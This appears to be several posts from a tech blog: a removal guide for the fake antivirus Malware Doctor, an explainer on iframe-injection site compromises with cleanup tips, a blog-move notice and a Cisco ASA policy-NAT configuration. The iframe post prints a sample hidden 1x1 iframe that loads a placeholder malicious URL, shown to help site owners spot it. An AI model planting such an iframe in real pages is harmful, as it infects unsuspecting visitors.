Malware Doctor (or MalwareDoc) is one of the many scam “antivirus” tools which are found all over the Internet which claims to help you get rid of viruses but it is actually a virus itself. The picture below shows how Malware Doctor looks like.

Malware Doctor will perform a “dummy” scan of your computer and will report that it found several viruses and malware on your computer. The program will then recommend you to proceed with removal of the “dummy viruses”. DO NOT proceed any further and DO NOT install Malware Doctor because this program is actually a malicious virus by itself. If you happened to fall in the trap of Malware Doctor, then you need to remove MalwareDoc as soon as possible. This program, after being installed on your computer, will steal you sensitive information (credit cards, passwords etc) and will fully compromise your computer’s security.

Malware Doctor Removal (The Hard Way)

To manually remove Malware Doctor you need to perform the following tasks. However, before continuing any further, backup your system and registry first. The following tasks can damage your computer so be very careful. It is better to proceed only if you know what you are doing. Further down I offer also an easier way to remove malware doctor (scroll further down If you want).

Step1: Stop Malware Doctor Processes
Malware Doctor.exe
MDsetup.exe
%ProgramFiles%\Malware Doctor\Malware Doctor.exe
%ProgramFiles%\Malware Doctor\unins000.exe

Step2: Delete the following DLL files

%ProgramFiles%\Malware Doctor\htmlayout.dll
%ProgramFiles%\Malware Doctor\Validation.dll

Step3: Uninstall and Remove all Malware Doctor directory and files

%ProgramFiles%\Malware Doctor\
%\Documents and Settings%\All Users\Start Menu\Programs\Malware Doctor\Malware Doctor.lnk

Step4: Delete all malware doctor folders

%\Documents and Settings%\All Users\Start Menu\Programs\Malware Doctor\
%ProgramFiles%\Malware Doctor\
%ProgramFiles%\Malware Doctor\GUI\

Step 5: Remove the following Registry values

HKEY_USERS\Software\Microsoft\Windows\Explorer\MenuOrder\Start Menu2\Programs\Malware Doctor
HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Uninstall\Malware Doctor
HKEY_CURRENT_USER\Software\Malware Doctor
HKEY_CURRENT_USER\Software\Malware Doctor\AntiSpy Knight
HKEY_LOCAL_MACHINE\SOFTWARE\Malware Doctor
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Malware Doctor_is1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run “Alcmtr”

Malware Doctor Removal (The Easy Way)

Now, if you don’t want to follow the hard manual way, there is an easier method to automatically remove Malware Doctor. That is, you can download the FREE trial of the famous Spyware Doctor software (from the well known software developer PCTools) and have it scan your computer. With the Free trial you will not be able to remove the Malware Doctor, but it will help you to identify all infected files and then remove them manually by yourself. However, if you register the program (its around $30 I think) you will be able to automatically remove Malware Doctor without having to mess around with registry values and all that stuff. Download the Free Trial of Spyware Doctor Here, or visit the Spyware Doctor Website for more information.

Recently thousands of legitimate websites are being hacked with the “Iframe code injection” attack resulting in Cross Site Scripting (XSS) for unsuspicious users who get infected with a malware virus when they visit that legitimate websites. What happens is that an “Iframe html code” is injected at the end (usually) of “index.php” or “index.html” files of the legitimate websites. This “iframe” code embeds into the legitimate site a malicious code which installs a virus to the visitor’s PC or tries to steal sensitive information. The <iframe> html tag is used to embed content from other website into the current page. Usually an injected iframe code looks like the following:

<iframe src=”http://some-malicious-web-url” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

The problem usually is not because of vulnerability on the website itself but rather is usually caused by a malware Trojan which infects the website owner’s PC. The Trojan (maybe Mpack script released by Russians and sold for $1000) steals the FTP password of the website owner and connects to the website as ftp user, thus being able to upload and modify files on the website. After the website gets infected, Google usually reports the site as “This Site May Harm Your Computer”, thus harming the reputation of the website.

Some tips to clean the infection of your site:

• First of all scan and clean your own computer which you use to connect to your site. The Trojan might be undetectable by some antivirus, so you better format the windows and install a fresh copy.
• Change ALL your passwords and most importantly the FTP passwords and the website control panel passwords.
• Download all files from your website and store them in a safe place on your PC to further analyze the infection.
• If you have a recent clean backup of your website, upload the backup files and replace all current files.
• If you don’t have a backup (shame on you!!) then edit all source code (html or PHP files) and search for <iframe> html commands inside the code. Delete the suspicious <iframe> and re-upload all html, php files to your website.
•  Download an antivirus tool which scans the website for <iframe> content. If you use WordPress there is an antivirus plugin for that which you can download directly from WordPress HERE.

I’m the owner of ciscoasa.com blog which I have decided to move over to this website. All content from ciscoasa.com is now available to the new domain tech21century.com. This new website will be enriched with content spanning a wider range of topics about Cisco networks and additional general technology topics and information. The IT world and technology in general is fascinating, so I feel excited about starting a new online presence such as this new blog and writing about the stuff I love.

As we know, the conventional NAT functionality on Cisco devices (routers, ASA firewalls etc) translates the SOURCE IP address to something else. There is also the so called “Destination based NAT” (or you may see it referred as “Reverse NAT”) which changes the destination IP address. Here we will deal with conventional source based NAT with a policy.

Sometimes we need to change the source IP address to another source address (lets call it “translated-A”) when we are communicating with “destination-A”, and also change the source IP to “translated-B” when we are communicating with “destination-B”.

 So, to be clearer, the scenario is the following:
 

• When internal host 192.168.1.1 wants to communicate with external host 100.100.100.1, then the internal host must be translated to 50.50.50.1
• When the internal host 192.168.1.1 wants to communicate with external host 200.200.200.1, then the internal host must be translated to 50.50.50.2

 We can achieve the functionality above with Policy-Based NAT.

Configuration Example:

Assume that the internal host 192.168.1.1 is connected to the inside interface of ASA. We have also in our possession the public IP range 50.50.50.0/24. We will use the public IP range to translate our internal host according to the destination.

! First create the access lists for the policy NAT
ASA(config)# access-list POLICYNAT-A extended permit ip host 192.168.1.1 host 100.100.100.1
ASA(config)# access-list POLICYNAT-B extended permit ip host 192.168.1.1 host 200.200.200.1

! Now create the static NAT translation for Destination-A
ASA(config)# static(inside,outside) 50.50.50.1 access-list POLICYNAT-A

! Now create the static NAT translation for Destination-B
ASA(config)# static(inside,outside) 50.50.50.2 access-list POLICYNAT-B

The above commands will do the following: When source address is 192.168.1.1 and destination address is 100.100.100.1, then change the source address to 50.50.50.1.

Similarly, when source address is 192.168.1.1 and destination is 200.200.200.1, then change the source address to 50.50.50.2.

The above static nat commands will only take effect if and only if the traffic is between the hosts referenced in the access-lists (either inbound or outbound traffic).